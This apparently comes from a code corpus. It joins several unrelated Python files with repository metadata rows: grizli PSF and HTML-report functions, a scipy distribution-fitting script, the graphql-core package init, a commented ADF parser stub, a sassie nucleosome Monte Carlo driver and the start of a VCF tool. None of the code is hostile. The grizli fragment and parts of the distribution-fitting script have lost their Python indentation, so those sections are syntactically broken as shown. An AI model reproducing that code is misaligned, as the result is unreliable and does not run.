get_extended=get_extended,
get_weight=True)
except:
continue
msk_i = (psf_i[1].data != 0)
msk_i &= np.isfinite(psf_i[1].data)
if msk_i.sum() == 0:
continue
if ix == 0:
# Initialize
msk_f = msk_i*1
psf_f = psf_i
psf_f[1].data[msk_f == 0] = 0
ix += 1
else:
# Add to existing
msk_f += msk_i*1
psf_f[1].data[msk_i > 0] += psf_i[1].data[msk_i > 0]
ix += 1
if psf_f is None:
msg = 'PSF for {0} (filter={1}) is empty'
print(msg.format(file, filter))
continue
# Average
psf_f[1].data /= np.maximum(msk_f, 1)
psf_f[1].header['FILTER'] = filter, 'Filter'
psf_f[1].header['PSCALE'] = scl, 'Pixel scale, arcsec'
psf_f[1].header['PIXFRAC'] = pf, 'Pixfrac'
psf_f[1].header['KERNEL'] = kern, 'Kernel'
psf_f[1].header['EXTNAME'] = 'PSF'
psf_f[1].header['EXTVER'] = label
hdu.append(psf_f[1])
if make_fits:
psf_file = '{0}-{1}_psf.fits'.format(root, filter)
hdu.writeto(psf_file, overwrite=True)
hdus.append(hdu)
return hdus
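# Sketch of generating field PSFs for the IR filters only (hypothetical root):
#
#   hdus = field_psf(root='j123456+012345', factors=[1, 2],
#                    psf_filters=['F125W', 'F160W'], make_fits=True)
#
# Each output '{root}-{filter}_psf.fits' contains one PSF extension per
# requested drizzle scale (extension labels 'DRIZ1', 'DRIZ2', ... and,
# with get_line_maps=True, 'LINE1', ...).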
def make_report(root, gzipped_links=True, xsize=18, output_dpi=None, make_rgb=True, mw_ebv=0):
"""
Make HTML report of the imaging and grism data products
"""
import glob
import matplotlib.pyplot as plt
import astropy.time
now = astropy.time.Time.now().iso
plt.ioff()
os.chdir('../Prep/')
bfilters = glob.glob('{0}-f[2-8]*sci.fits'.format(root))
bfilters.sort()
rfilters = glob.glob('{0}-f[01]*sci.fits'.format(root))
rfilters.sort()
filters = [f.split('-')[-1].split('_dr')[0] for f in bfilters + rfilters]
if len(filters) == 0:
has_mosaics = False
visits, groups, info = np.load('{0}_visits.npy'.format(root),
allow_pickle=True)
filters = np.unique([v['product'].split('-')[-1] for v in visits])
else:
has_mosaics = True
if make_rgb & has_mosaics:
field_rgb(root, HOME_PATH=None, xsize=xsize, output_dpi=output_dpi, ds9=None, scl=2, suffix='.rgb', timestamp=True, mw_ebv=mw_ebv)
for filter in filters:
field_rgb(root, HOME_PATH=None, xsize=18, ds9=None, scl=2, force_rgb=[filter, 'sum', 'sum'], suffix='.'+filter, timestamp=True)
##
## Mosaic table
##
rows = []
line = 'grep -e " 0 " -e "radec" *{0}*wcs.log > /tmp/{1}.log'
for filter in filters:
os.system(line.format(filter.strip('u'), root))
wcs_files = glob.glob('*{0}*wcs.log'.format(filter))
wcs = '<pre>'+''.join(open('/tmp/{0}.log'.format(root)).readlines())+'</pre>'
for file in wcs_files:
png_url = '<a href={1}>{0}</a>'.format(file, file.replace('.log', '.png').replace('+', '%2B'))
wcs = wcs.replace(file, png_url)
try:
im = pyfits.open(glob.glob('{0}-{1}*sci.fits'.format(root, filter))[0])
h = im[0].header
url = '<a href="./{0}">sci</a>'.format(im.filename())
url += ' '+url.replace('_sci', '_wht').replace('>sci', '>wht')
if gzipped_links:
url = url.replace('.fits', '.fits.gz')
psf_file = '{0}-{1}_psf.fits'.format(root, filter)
if os.path.exists(psf_file):
url += ' '+'<a href="./{0}">psf</a>'.format(psf_file)
row = [filter, url, '{0} {1}'.format(h['NAXIS1'], h['NAXIS2']), '{0:.5f} {1:.5f}'.format(h['CRVAL1'], h['CRVAL2']), h['EXPTIME'], h['NDRIZIM'], wcs, '<a href={0}.{1}.jpg><img src={0}.{1}.jpg height=200px></a>'.format(root, filter)]
except:
row = [filter, '--', '--', '--', 0., 0, wcs, '--']
rows.append(row)
tab = utils.GTable(rows=rows, names=['filter', 'FITS', 'naxis', 'crval', 'exptime', 'ndrizim', 'wcs_log', 'img'], dtype=[str, str, str, str, float, int, str, str])
tab['exptime'].format = '.1f'
tab.write_sortable_html('{0}.summary.html'.format(root), replace_braces=True, localhost=False, max_lines=500, table_id=None, table_class='display compact', css=None, filter_columns=[], buttons=['csv'], toggle=False, use_json=False)
## Grism figures
column_files = glob.glob('*column.png')
if len(column_files) > 0:
column_files.sort()
column_url = '<div>' + ' '.join(['<a href="./{0}"><img src="./{0}" height=100px title="{1}"></a>'.format(f.replace('+', '%2B'), f) for f in column_files]) + '</div>'
else:
column_url = ''
grism_files = glob.glob('../Extractions/*grism*fits*')
if len(grism_files) > 0:
grism_files.sort()
grism_pngs = glob.glob('../Extractions/*grism*png')
if len(grism_pngs) > 0:
grism_pngs.sort()
grism_url = '<div>' + ' '.join(['<a href="./{0}"><img src="./{0}" width=400px title="{1}"></a>'.format(f.replace('+', '%2B'), f) for f in grism_pngs]) + '</div>\n'
else:
grism_url = ''
grism_url += '<pre>'
grism_url += '\n'.join(['<a href="./{0}">{1}</a>'.format(f.replace('+', '%2B'), f) for f in grism_files])
grism_url += '\n <a href=../Extractions/{0}-fit.html> {0}-fit.html </a>'.format(root)
grism_url += '\n <a href="../Extractions/{0}_zhist.png"><img src="../Extractions/{0}_zhist.png" width=400px title="{0}_zhist.png"> </a>'.format(root)
grism_url += '\n</pre>'
if gzipped_links:
grism_url = grism_url.replace('.fits', '.fits.gz')
else:
grism_url = ''
try:
catalog = glob.glob('{0}-*.cat.fits'.format(root))[0]
except:
catalog = 'xxx'
catroot = catalog.split('.cat.fits')[0]
root_files = glob.glob('{0}-[ioyh]*fits*'.format(root))
root_files.sort()
if gzipped_links:
gzext = '.gz'
else:
gzext = ''
root_urls = '\n '.join(['<a href={0}{1}>{0}{1}</a>'.format(f, gzext) for f in root_files])
body = """
<h4>{root} </h4>
{now}<br>
<a href={root}.exposures.html>Exposure report</a>
/ <a href={root}_expflag.txt>{root}_expflag.txt</a>
/ <a href={root}.auto_script.log.txt>{root}.auto_script.log.txt</a>
/ <a href={root}.auto_script.yml>{root}.auto_script.yml</a>
<pre>
{root_urls}
<a href="{root}_visits.npy">{root}_visits.npy</a>
</pre>
{column}
{grism}
<a href="./{root}.rgb.jpg"><img src="./{root}.rgb.jpg" height=300px></a>
<a href="https://s3.amazonaws.com/grizli-v1/Master/{root}_footprint.png"><img src="https://s3.amazonaws.com/grizli-v1/Master/{root}_footprint.png" height=300px></a>
<a href="./{root}_fine.png"><img src="./{root}_fine.png" height=200px></a>
<br>
""".format(root=root, column=column_url, grism=grism_url, gz='.gz'*(gzipped_links), now=now, catroot=catroot, root_urls=root_urls)
lines = open('{0}.summary.html'.format(root)).readlines()
for i in range(len(lines)):
if '<body>' in lines[i]:
break
lines.insert(i+1, body)
fp = open('{0}.summary.html'.format(root), 'w')
fp.writelines(lines)
fp.close()
def exposure_report(root, log=True):
"""
Save exposure info to webpage & json file
"""
if log:
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.exposure_report')
from collections import OrderedDict
import json
# Exposures
visits, all_groups, info = np.load('{0}_visits.npy'.format(root),
allow_pickle=True)
tab = utils.GTable(info)
tab.add_index('FILE')
visit_product = ['']*len(info)
ramp = ['']*len(info)
trails = ['']*len(info)
persnpix = [-1]*len(info)
tab['complete'] = False
flt_dict = OrderedDict()
for visit in visits:
failed = len(glob.glob('{0}*fail*'.format(visit['product']))) > 0
for file in visit['files']:
ix = tab.loc_indices[file]
if os.path.exists(file):
fobj = pyfits.open(file)
fd = utils.flt_to_dict(fobj)
fd['complete'] = not failed
flt_dict[file] = fd
flt_dict['visit'] = visit['product']
if 'PERSNPIX' in fobj[0].header:
persnpix[ix] = fobj[0].header['PERSNPIX']
visit_product[ix] = visit['product']
tab['complete'][ix] = not failed
base = file.split('_')[0]
ramp_file = '../RAW/{0}_ramp.png'.format(base)
has_mask = glob.glob('{0}*mask.reg'.format(base))
if has_mask:
extra = ' style="border:5px solid red;"'
else:
extra = ''
if os.path.exists(ramp_file):
ramp[ix] = '<a href="{0}"><img src="{0}" height=180 {1}></a>'.format(ramp_file, extra)
trails_file = '../RAW/{0}_trails.png'.format(base)
if os.path.exists(trails_file):
trails[ix] = '<a href="{0}"><img src="{0}" height=180 {1}></a>'.format(trails_file, extra)
tab['persnpix'] = persnpix
tab['product'] = visit_product
tab['ramp'] = ramp
tab['trails'] = trails
tab['EXPSTART'].format = '.3f'
tab['EXPTIME'].format = '.1f'
tab['PA_V3'].format = '.1f'
tab['RA_TARG'].format = '.6f'
tab['DEC_TARG'].format = '.6f'
    # Turn each FILE entry into a URL
file_urls = ['<a href="./{0}">{0}</a>'.format(f) for f in tab['FILE']]
tab['FLT'] = file_urls
cols = ['FLT']+tab.colnames[1:-1]
fp = open('{0}_exposures.json'.format(root), 'w')
json.dump(flt_dict, fp)
fp.close()
tab[cols].write_sortable_html('{0}.exposures.html'.format(root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=[], buttons=['csv'], toggle=True, use_json=False)
|
gbrammer/grizli
|
grizli/pipeline/auto_script.py
|
Python
|
mit
| 183,603
|
[
"Gaussian",
"VisIt"
] |
1cc9b180913321bb6450c6fcb72246f789efcdc48e8333d58d249707627652f2
|
#!/usr/bin/env python
#title :distribution_check.py
#description :Checks a sample against 80 distributions by applying the Kolmogorov-Smirnov test.
#author :Andre Dietrich
#email :dietrich@ivs.cs.uni-magdeburg.de
#date :07.10.2014
#version :0.1
#usage :python distribution_check.py -f filename -v
#python_version :2.* and 3.*
#########################################################################################
from __future__ import print_function
import scipy.stats
import operator
import warnings
import random
import math
# just for suppressing warnings
warnings.simplefilter('ignore')
from joblib import Parallel, delayed
import multiprocessing
from optparse import OptionParser
########################################################################################
# list of all available distributions
cdfs = {
"alpha": {"p":[], "D": []}, #Alpha
"anglit": {"p":[], "D": []}, #Anglit
"arcsine": {"p":[], "D": []}, #Arcsine
"beta": {"p":[], "D": []}, #Beta
"betaprime": {"p":[], "D": []}, #Beta Prime
"bradford": {"p":[], "D": []}, #Bradford
"burr": {"p":[], "D": []}, #Burr
"cauchy": {"p":[], "D": []}, #Cauchy
"chi": {"p":[], "D": []}, #Chi
"chi2": {"p":[], "D": []}, #Chi-squared
"cosine": {"p":[], "D": []}, #Cosine
"dgamma": {"p":[], "D": []}, #Double Gamma
"dweibull": {"p":[], "D": []}, #Double Weibull
"erlang": {"p":[], "D": []}, #Erlang
"expon": {"p":[], "D": []}, #Exponential
"exponweib": {"p":[], "D": []}, #Exponentiated Weibull
"exponpow": {"p":[], "D": []}, #Exponential Power
"f": {"p":[], "D": []}, #F (Snecdor F)
"fatiguelife": {"p":[], "D": []}, #Fatigue Life (Birnbaum-Sanders)
"fisk": {"p":[], "D": []}, #Fisk
"foldcauchy": {"p":[], "D": []}, #Folded Cauchy
"foldnorm": {"p":[], "D": []}, #Folded Normal
"frechet_r": {"p":[], "D": []}, #Frechet Right Sided, Extreme Value Type II
"frechet_l": {"p":[], "D": []}, #Frechet Left Sided, Weibull_max
"gamma": {"p":[], "D": []}, #Gamma
"gausshyper": {"p":[], "D": []}, #Gauss Hypergeometric
"genexpon": {"p":[], "D": []}, #Generalized Exponential
"genextreme": {"p":[], "D": []}, #Generalized Extreme Value
"gengamma": {"p":[], "D": []}, #Generalized gamma
"genhalflogistic": {"p":[], "D": []}, #Generalized Half Logistic
"genlogistic": {"p":[], "D": []}, #Generalized Logistic
"genpareto": {"p":[], "D": []}, #Generalized Pareto
"gilbrat": {"p":[], "D": []}, #Gilbrat
"gompertz": {"p":[], "D": []}, #Gompertz (Truncated Gumbel)
"gumbel_l": {"p":[], "D": []}, #Left Sided Gumbel, etc.
"gumbel_r": {"p":[], "D": []}, #Right Sided Gumbel
"halfcauchy": {"p":[], "D": []}, #Half Cauchy
"halflogistic": {"p":[], "D": []}, #Half Logistic
"halfnorm": {"p":[], "D": []}, #Half Normal
"hypsecant": {"p":[], "D": []}, #Hyperbolic Secant
"invgamma": {"p":[], "D": []}, #Inverse Gamma
"invgauss": {"p":[], "D": []}, #Inverse Normal
"invweibull": {"p":[], "D": []}, #Inverse Weibull
"johnsonsb": {"p":[], "D": []}, #Johnson SB
"johnsonsu": {"p":[], "D": []}, #Johnson SU
"laplace": {"p":[], "D": []}, #Laplace
"logistic": {"p":[], "D": []}, #Logistic
"loggamma": {"p":[], "D": []}, #Log-Gamma
"loglaplace": {"p":[], "D": []}, #Log-Laplace (Log Double Exponential)
"lognorm": {"p":[], "D": []}, #Log-Normal
"lomax": {"p":[], "D": []}, #Lomax (Pareto of the second kind)
"maxwell": {"p":[], "D": []}, #Maxwell
"mielke": {"p":[], "D": []}, #Mielke's Beta-Kappa
"nakagami": {"p":[], "D": []}, #Nakagami
"ncx2": {"p":[], "D": []}, #Non-central chi-squared
"ncf": {"p":[], "D": []}, #Non-central F
"nct": {"p":[], "D": []}, #Non-central Student's T
"norm": {"p":[], "D": []}, #Normal (Gaussian)
"pareto": {"p":[], "D": []}, #Pareto
"pearson3": {"p":[], "D": []}, #Pearson type III
"powerlaw": {"p":[], "D": []}, #Power-function
"powerlognorm": {"p":[], "D": []}, #Power log normal
"powernorm": {"p":[], "D": []}, #Power normal
"rdist": {"p":[], "D": []}, #R distribution
"reciprocal": {"p":[], "D": []}, #Reciprocal
"rayleigh": {"p":[], "D": []}, #Rayleigh
"rice": {"p":[], "D": []}, #Rice
"recipinvgauss": {"p":[], "D": []}, #Reciprocal Inverse Gaussian
"semicircular": {"p":[], "D": []}, #Semicircular
"t": {"p":[], "D": []}, #Student's T
"triang": {"p":[], "D": []}, #Triangular
"truncexpon": {"p":[], "D": []}, #Truncated Exponential
"truncnorm": {"p":[], "D": []}, #Truncated Normal
"tukeylambda": {"p":[], "D": []}, #Tukey-Lambda
"uniform": {"p":[], "D": []}, #Uniform
"vonmises": {"p":[], "D": []}, #Von-Mises (Circular)
"wald": {"p":[], "D": []}, #Wald
"weibull_min": {"p":[], "D": []}, #Minimum Weibull (see Frechet)
"weibull_max": {"p":[], "D": []}, #Maximum Weibull (see Frechet)
"wrapcauchy": {"p":[], "D": []}, #Wrapped Cauchy
"ksone": {"p":[], "D": []}, #Kolmogorov-Smirnov one-sided (no stats)
"kstwobign": {"p":[], "D": []}} #Kolmogorov-Smirnov two-sided test for Large N
########################################################################################
# this part is only used to read in the file ...
# format should be :
# 0.00192904472351
# 0.0030369758606
# 0.00188088417053
# 0.00222492218018
# 0.00447607040405
# 0.00301194190979
def read(filename):
    if filename != "":
        print("reading data in file %s ... " % filename, end="")
        f = open(filename)
        data = [float(value) for value in f.readlines()]
        f.close()
        print("done")
        return data
########################################################################################
def check(data, fct, verbose=False):
    # fit the data set against the given probability distribution
parameters = eval("scipy.stats."+fct+".fit(data)");
    # Apply the Kolmogorov-Smirnov two-sided test
D, p = scipy.stats.kstest(data, fct, args=parameters);
if math.isnan(p): p=0
if math.isnan(D): D=0
if verbose:
print(fct.ljust(16) + "p: " + str(p).ljust(25) + "D: " +str(D))
return (fct, p, D)
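########################################################################################
# Illustrative sketch (added for clarity; not part of the original script):
# fitting a synthetic normal sample against a single candidate distribution.
# The helper name below is hypothetical and the function is never called.
def _example_single_check():
    sample = scipy.stats.norm(loc=5.0, scale=2.0).rvs(size=1000)
    name, p, D = check(sample, "norm", verbose=True)
    # a large p-value and a small D statistic indicate a good fit
    return name, p, D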
########################################################################################
def plot(fcts, data):
import matplotlib.pyplot as plt
import numpy as np
# plot data
    plt.hist(data, normed=True, bins=max(10, len(data) // 10))
# plot fitted probability
for fct in fcts:
params = eval("scipy.stats."+fct+".fit(data)")
f = eval("scipy.stats."+fct+".freeze"+str(params))
x = np.linspace(f.ppf(0.001), f.ppf(0.999), 500)
plt.plot(x, f.pdf(x), lw=3, label=fct)
plt.legend(loc='best', frameon=False)
plt.title("Top "+str(len(fcts))+" Results")
plt.show()
def plotDensities(best):
import matplotlib.pyplot as plt
import numpy as np
plt.ion()
plt.clf()
# plot fitted probability
for i in range(len(best)-1, -1, -1):
fct, values = best[i]
        plt.hist(values["p"], normed=True, bins=max(10, len(values["p"]) // 10), label=str(i+1)+". "+fct, alpha=0.5)
plt.legend(loc='best', frameon=False)
plt.title("Top Results")
plt.show()
plt.draw()
if __name__ == '__main__':
#########################################################################################
parser = OptionParser()
parser.add_option("-f", "--file", dest="filename", default="", type="string", help="file with measurement data", metavar="FILE")
parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true", help="print all results immediately (default=False)" )
parser.add_option("-t", "--top", dest="top", default=10, type="int", help="define amount of printed results (default=10)")
parser.add_option("-p", "--plot", dest="plot", default=False, action="store_true", help="plot the best result with matplotlib (default=False)")
parser.add_option("-i", "--iterative", dest="iterative", default=1, type="int", help="define number of iterative checks (default=1)")
parser.add_option("-e", "--exclude", dest="exclude", default=10.0, type="float", help="amount (in per cent) of exluded samples for each iteration (default=10.0%)" )
parser.add_option("-n", "--processes", dest="processes", default=-1, type="int", help="number of process used in parallel (default=-1...all)")
parser.add_option("-d", "--densities", dest="densities", default=False, action="store_true", help="")
parser.add_option("-g", "--generate", dest="generate", default=False, action="store_true", help="generate an example file")
(options, args) = parser.parse_args()
if options.generate:
print("generating random data 'example-halflogistic.dat' ... ", end="")
f = open("example-halflogistic.dat", "w")
f.writelines([str(s)+"\n" for s in scipy.stats.halflogistic().rvs(500)])
f.close()
print("done")
quit()
# read data from file or generate
DATA = read(options.filename)
for i in range(options.iterative):
if options.iterative == 1:
data = DATA
else:
data = [value for value in DATA if random.random()>= options.exclude/100]
results = Parallel(n_jobs=options.processes)(delayed(check)(data, fct, options.verbose) for fct in cdfs.keys())
for res in results:
key, p, D = res
cdfs[key]["p"].append(p)
cdfs[key]["D"].append(D)
print( "-------------------------------------------------------------------" )
print( "Top %d after %d iteration(s)" % (options.top, i+1, ) )
print( "-------------------------------------------------------------------" )
best = sorted(cdfs.items(), key=lambda elem : scipy.median(elem[1]["p"]), reverse=True)
for t in range(options.top):
fct, values = best[t]
print( str(t+1).ljust(4), fct.ljust(16),
"\tp: ", scipy.median(values["p"]),
"\tD: ", scipy.median(values["D"]),
end="")
if len(values["p"]) > 1:
print("\tvar(p): ", scipy.var(values["p"]),
"\tvar(D): ", scipy.var(values["D"]), end="")
print()
if options.densities:
plotDensities(best[:t+1])
if options.plot:
# get only the names ...
plot([b[0] for b in best[:options.top]], DATA)
|
Kirubaharan/hydrology
|
stats/distribution_check.py
|
Python
|
gpl-3.0
| 11,192
|
[
"Gaussian"
] |
87eba6492fe2f06b8309bfc9ae33d5402df690dbabc1e1af86735b96ccf3d0c1
|
'''
GraphQL.js provides a reference implementation for the GraphQL specification
but is also a useful utility for operating on GraphQL files and building
sophisticated tools.
This primary module exports a general purpose function for fulfilling all
steps of the GraphQL specification in a single operation, but also includes
utilities for every part of the GraphQL specification:
- Parsing the GraphQL language.
- Building a GraphQL type schema.
- Validating a GraphQL request against a type schema.
- Executing a GraphQL request against a type schema.
This also includes utility functions for operating on GraphQL types and
GraphQL documents to facilitate building tools.
You may also import from each sub-directory directly. For example, the
following two import statements are equivalent:
from graphql import parse
from graphql.language.base import parse
'''
from .pyutils.version import get_version
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages when
# the required packages are not installed
__GRAPHQL_SETUP__
except NameError:
__GRAPHQL_SETUP__ = False
VERSION = (1, 1, 0, 'final', 0)
__version__ = get_version(VERSION)
if not __GRAPHQL_SETUP__:
# The primary entry point into fulfilling a GraphQL request.
from .graphql import (
graphql
)
# Create and operate on GraphQL type definitions and schema.
from .type import ( # no import order
GraphQLSchema,
# Definitions
GraphQLScalarType,
GraphQLObjectType,
GraphQLInterfaceType,
GraphQLUnionType,
GraphQLEnumType,
GraphQLInputObjectType,
GraphQLList,
GraphQLNonNull,
GraphQLField,
GraphQLInputObjectField,
GraphQLArgument,
# "Enum" of Type Kinds
TypeKind,
# "Enum" of Directive locations
DirectiveLocation,
# Scalars
GraphQLInt,
GraphQLFloat,
GraphQLString,
GraphQLBoolean,
GraphQLID,
# Directive definition
GraphQLDirective,
# Built-in directives defined by the Spec
specified_directives,
GraphQLSkipDirective,
GraphQLIncludeDirective,
GraphQLDeprecatedDirective,
# Constant Deprecation Reason
DEFAULT_DEPRECATION_REASON,
# GraphQL Types for introspection.
__Schema,
__Directive,
__DirectiveLocation,
__Type,
__Field,
__InputValue,
__EnumValue,
__TypeKind,
# Meta-field definitions.
SchemaMetaFieldDef,
TypeMetaFieldDef,
TypeNameMetaFieldDef,
# Predicates
is_type,
is_input_type,
is_output_type,
is_leaf_type,
is_composite_type,
is_abstract_type,
# Un-modifiers
get_nullable_type,
get_named_type,
)
# Parse and operate on GraphQL language source files.
from .language.base import ( # no import order
Source,
get_location,
# Parse
parse,
parse_value,
# Print
print_ast,
# Visit
visit,
ParallelVisitor,
TypeInfoVisitor,
BREAK,
)
# Execute GraphQL queries.
from .execution import ( # no import order
execute,
MiddlewareManager,
middlewares
)
# Validate GraphQL queries.
from .validation import ( # no import order
validate,
specified_rules,
)
# Create and format GraphQL errors.
from .error import (
GraphQLError,
format_error,
)
# Utilities for operating on GraphQL type schema and parsed sources.
from .utils.base import (
# The GraphQL query recommended for a full schema introspection.
introspection_query,
# Gets the target Operation from a Document
get_operation_ast,
# Build a GraphQLSchema from an introspection result.
build_client_schema,
# Build a GraphQLSchema from a parsed GraphQL Schema language AST.
build_ast_schema,
# Extends an existing GraphQLSchema from a parsed GraphQL Schema
# language AST.
extend_schema,
# Print a GraphQLSchema to GraphQL Schema language.
print_schema,
# Create a GraphQLType from a GraphQL language AST.
type_from_ast,
        # Create a Python value from a GraphQL language AST.
        value_from_ast,
        # Create a GraphQL language AST from a Python value.
ast_from_value,
# A helper to use within recursive-descent visitors which need to be aware of
# the GraphQL type system.
TypeInfo,
        # Determine if Python values adhere to a GraphQL type.
is_valid_value,
# Determine if AST values adhere to a GraphQL type.
is_valid_literal_value,
# Concatenates multiple AST together.
concat_ast,
# Comparators for types
is_equal_type,
is_type_sub_type_of,
do_types_overlap,
# Asserts a string is a valid GraphQL name.
assert_valid_name,
)
__all__ = (
'graphql',
'GraphQLBoolean',
'GraphQLEnumType',
'GraphQLFloat',
'GraphQLID',
'GraphQLInputObjectType',
'GraphQLInt',
'GraphQLInterfaceType',
'GraphQLList',
'GraphQLNonNull',
'GraphQLField',
'GraphQLInputObjectField',
'GraphQLArgument',
'GraphQLObjectType',
'GraphQLScalarType',
'GraphQLSchema',
'GraphQLString',
'GraphQLUnionType',
'GraphQLDirective',
'specified_directives',
'GraphQLSkipDirective',
'GraphQLIncludeDirective',
'GraphQLDeprecatedDirective',
'DEFAULT_DEPRECATION_REASON',
'TypeKind',
'DirectiveLocation',
'__Schema',
'__Directive',
'__DirectiveLocation',
'__Type',
'__Field',
'__InputValue',
'__EnumValue',
'__TypeKind',
'SchemaMetaFieldDef',
'TypeMetaFieldDef',
'TypeNameMetaFieldDef',
'get_named_type',
'get_nullable_type',
'is_abstract_type',
'is_composite_type',
'is_input_type',
'is_leaf_type',
'is_output_type',
'is_type',
'BREAK',
'ParallelVisitor',
'Source',
'TypeInfoVisitor',
'get_location',
'parse',
'parse_value',
'print_ast',
'visit',
'execute',
'MiddlewareManager',
'middlewares',
'specified_rules',
'validate',
'GraphQLError',
'format_error',
'TypeInfo',
'assert_valid_name',
'ast_from_value',
'build_ast_schema',
'build_client_schema',
'concat_ast',
'do_types_overlap',
'extend_schema',
'get_operation_ast',
'introspection_query',
'is_equal_type',
'is_type_sub_type_of',
'is_valid_literal_value',
'is_valid_value',
'print_schema',
'type_from_ast',
'value_from_ast',
'get_version',
)
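

# Illustrative sketch (added for reference; not part of the vendored package):
# a minimal end-to-end use of the exports above. The schema, field name and
# helper name below are hypothetical, and the function is never called.
def _hello_world_example():
    schema = GraphQLSchema(
        query=GraphQLObjectType(
            name='Query',
            fields={
                'hello': GraphQLField(
                    GraphQLString,
                    # accept any resolver call signature to stay version-agnostic
                    resolver=lambda *_args, **_kwargs: 'world',
                ),
            },
        )
    )
    document = parse('{ hello }')          # parse the request into an AST
    errors = validate(schema, document)    # expected to be an empty list
    result = graphql(schema, '{ hello }')  # parse + validate + execute in one call
    return errors, result.data             # expected: ([], {'hello': 'world'})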
|
wandb/client
|
wandb/vendor/graphql-core-1.1/wandb_graphql/__init__.py
|
Python
|
mit
| 7,300
|
[
"VisIt"
] |
c76333382ed88a97450acbc2999575a2069a714c6f7476934e46dd6f8759b8d2
|
## -*- coding: utf-8 -*-
## Copyright (c) 2015-2018, Exa Analytics Development Team
## Distributed under the terms of the Apache License 2.0
#"""
#Parser for ADF's SCF Section
################################
#Parses the 'S C F' section of an ADF block output.
#"""
#from exa import Parser, Matches, Match
#
#
#class SCF(Parser):
# """
# """
# _start = " S C F"
# _stop = -1
#
# def _parse_stops_1(self, starts):
# """
# """
# key = " Integrated fractional orbital density"
# matches = []
# for start in starts:
# m = self.find_next(key, cursor=start[0])
# if m is None:
# matches.append(Match(len(self), None))
# else:
# matches.append(m)
# return Matches(key, *matches)
|
avmarchenko/exatomic
|
exatomic/adf/adf/scf.py
|
Python
|
apache-2.0
| 793
|
[
"ADF"
] |
5be68e21eac438ae3e57a4e30f4a4d8c906647592c273ec7b83dc3c28981ebf5
|
'''
Driver method to run the monte_carlo module using mixed DNA and protein moves
with simple options for a nucleosomecore particle (NCP)
$Id: gui_mimic_simplest_ncp.py 3103 2016-04-26 20:15:12Z schowell $
'''
import sys
import multiprocessing
import sassie.interface.input_filter as input_filter
import sassie.simulate.monte_carlo.monte_carlo as monte_carlo
# import monte_carlo
svariables = {}
################################# user input ##################################
################################# user input ##################################
################################# user input ##################################
# input files
pdbfile='c36_w601_ncp_min.pdb'
psffile='c36_w601_ncp.psf'
# output file
dcdfile='ncp_test.dcd'
# run parameters
runname = 'run_ncp_test'
trial_steps = '10'
goback = '1'
temperature = '300.0'
n_flex_regions = 2
number_of_flexible_regions = str(n_flex_regions)
rotation_direction_array = ['reverse'] * n_flex_regions # irrelevant for DNA
delta_theta_array = '10.0, 30.0'
overlap_basis = 'heavy'
# setup flexible regions
basis_string_array = []
post_basis_string_array = []
basis_string_array.append(
'(segname DNA1 and resid > 150 and resid < 161) or (segname DNA2 and resid > 193 and resid < 204)'
)
basis_string_array.append(
'segname 1H3 and resid < 40 and resid > 1'
)
post_basis_string_array.append(
'(segname DNA1 and resid 161) or (segname DNA2 and resid 193)'
)
post_basis_string_array.append(
'segname 1H3 and resid <= 1'
)
rotation_type_array = ['double_stranded_nucleic_torsion',
'protein_backbone_torsion']
# hard coded parameters
psf_flag = True
# openmm parameters no longer used but still required (irrelevant)
max_steps = '5000'
energy_convergence = '1.0'
step_size = '0.002'
# advanced input (may not be fully implemented)
low_rg_cutoff = '0'
high_rg_cutoff = '400.0'
z_flag = False
z_cutoff = '0.0'
constraint_flag = False
constraint_file = 'constraints.txt'
directed_mc = '0'
nonbondflag = '0' # not sure what this is for
seed = '0,123' # set this to '1,123' ('0,123') to (not) set the seed
############################### end user input ################################
############################### end user input ################################
############################### end user input ################################
svariables['runname'] = (runname, 'string')
svariables['dcdfile'] = (dcdfile, 'string')
svariables['pdbfile'] = (pdbfile, 'string')
svariables['psffile'] = (psffile, 'string')
svariables['psf_flag'] = (psf_flag, 'string')
svariables['max_steps'] = (max_steps, 'int')
svariables['energy_convergence'] = (energy_convergence, 'float')
svariables['step_size'] = (step_size, 'float')
svariables['number_of_flexible_regions'] = (number_of_flexible_regions, 'int')
svariables['basis_string_array'] = (basis_string_array, 'string')
svariables['delta_theta_array'] = (delta_theta_array, 'float_array')
svariables['rotation_type_array'] = (rotation_type_array, 'string')
svariables['rotation_direction_array'] = (rotation_direction_array, 'string')
svariables['overlap_basis'] = (overlap_basis, 'string')
svariables['post_basis_string_array'] = (post_basis_string_array, 'string')
svariables['temperature'] = (temperature, 'float')
svariables['trial_steps'] = (trial_steps, 'int')
svariables['goback'] = (goback, 'int')
svariables['directed_mc'] = (directed_mc, 'float')
svariables['low_rg_cutoff'] = (low_rg_cutoff, 'float')
svariables['high_rg_cutoff'] = (high_rg_cutoff, 'float')
svariables['z_flag'] = (z_flag, 'boolean')
svariables['z_cutoff'] = (z_cutoff, 'float')
svariables['constraint_flag'] = (constraint_flag, 'boolean')
svariables['constraint_file'] = (constraint_file, 'string')
svariables['nonbondflag'] = (nonbondflag, 'int')
svariables['seed'] = (seed, 'int_array')
error, variables = input_filter.type_check_and_convert(svariables)
assert not error, 'ERROR: %s' % error
txtQueue=multiprocessing.JoinableQueue()
simulation = monte_carlo.simulation()
simulation.main(variables, txtQueue)
this_text = txtQueue.get(True, timeout=0.1)
# perform alignment
try:
import os
import subprocess
import sassie.util.file_utils as file_utils
import sassie.tools.align_driver as align_driver
dcd = os.path.join(runname, 'monte_carlo', dcdfile)
assert os.path.exists(dcd), 'no such file: %s' % dcd
align_basis = (
'((name[i] == "CA") and (segname[i] == "1H2A") and (resid[i] > 105) and (resid[i] < 115))'
)
inputs = align_driver.inputs()
inputs.path = ''
inputs.goal_filter = align_basis
inputs.move_filter = align_basis
inputs.goal = pdbfile
inputs.ref = pdbfile
inputs.move = dcd
inputs.out = dcd.replace('.dcd', '_al.dcd')
file_utils.mkdir_p(os.path.split(inputs.out)[0])
align_driver.align(inputs)
cmd = 'mv %s %s' % (inputs.out, inputs.move)
return_code = subprocess.call(cmd, shell=True)
if return_code:
print 'Failed to move output: %s' % cmd
except:
    print 'Alignment of NCP failed'
|
madscatt/zazzie_1.5
|
trunk/sassie/simulate/monte_carlo/gui_mimic_simplest_ncp.py
|
Python
|
gpl-3.0
| 5,047
|
[
"OpenMM"
] |
afeedc21e3aec0aded9b62acdfe1ac8edcaecc1ebfc43f7484d41560cf171855
|
# -*- coding: utf-8 -*-
#
# A way to combine vcf files
#
